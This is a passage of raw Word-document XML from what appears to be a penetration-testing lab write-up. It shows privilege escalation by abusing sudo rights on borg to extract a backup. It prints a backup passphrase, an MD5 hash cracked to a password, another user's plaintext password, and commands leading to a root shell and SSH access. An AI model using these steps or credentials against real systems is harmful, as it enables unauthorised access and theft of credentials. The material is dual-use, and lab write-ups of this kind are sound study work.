          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="305" name="image300.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image300.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId660"/>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1F5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see a lot output with borg. And also, you see this PASSPHRASE which will be important when using borg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passphrase is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xinyVzoH2AnJpRK9sfMgBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The most important information is not only the passphrase though. We see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/borgbackup::usb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a lot. In borg, this means</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/borgbackup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the borg repository, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the archive inside of the repo. But, there might be multiple archives in the borg repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command (as seen previously in the output of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to list all archives in the borg repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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sudo /usr/bin/borg list /opt/borgbackup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will ask for passphrase so give it the one found in pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>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05500" cy="1028700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="378" name="image374.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image374.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId661"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59055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1F62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Besides the USB archives, we see a "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" one that looks interesting!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can try and extract that archive and print it to the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/borg extract /opt/borgbackup::home --stdout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses the borg binary to extract the archive named "home"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When it asks for passphrase, use the one you found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>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xinyVzoH2AnJpRK9sfMgBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then prints the content into terminal using "--stdout"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This output included two credentials near the bottom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>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3670300" cy="406400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="123" name="image126.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image126.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId662"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="36703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1F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>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amy : 0814b6b7f0de51ecf54ca5b6e6e612bf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="279400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="152" name="image147.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image147.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId663"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="279400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>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andrew : Rb9kNokjDsjYyH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We were  supposed to use switch users on this machine to amy. But when I tried her password, it failed. And it looks encoded. So I first used a hash identifier and then cracked it after I realized it's MD5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId664">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hashes.com/en/tools/hash_identifier</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to identify hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId665">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crackstation.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to crack it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> backups1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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su amy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type in password:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backups1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then checking sudo -l, we have all permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>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sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are now root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And for Andrew's credentials, we just SSH into 172.16.xxx.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xnqz3wdljgu4" w:id="269"/>
      <w:bookmarkEnd w:id="269"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/composer </w:t>
      </w:r>
    </w:p>
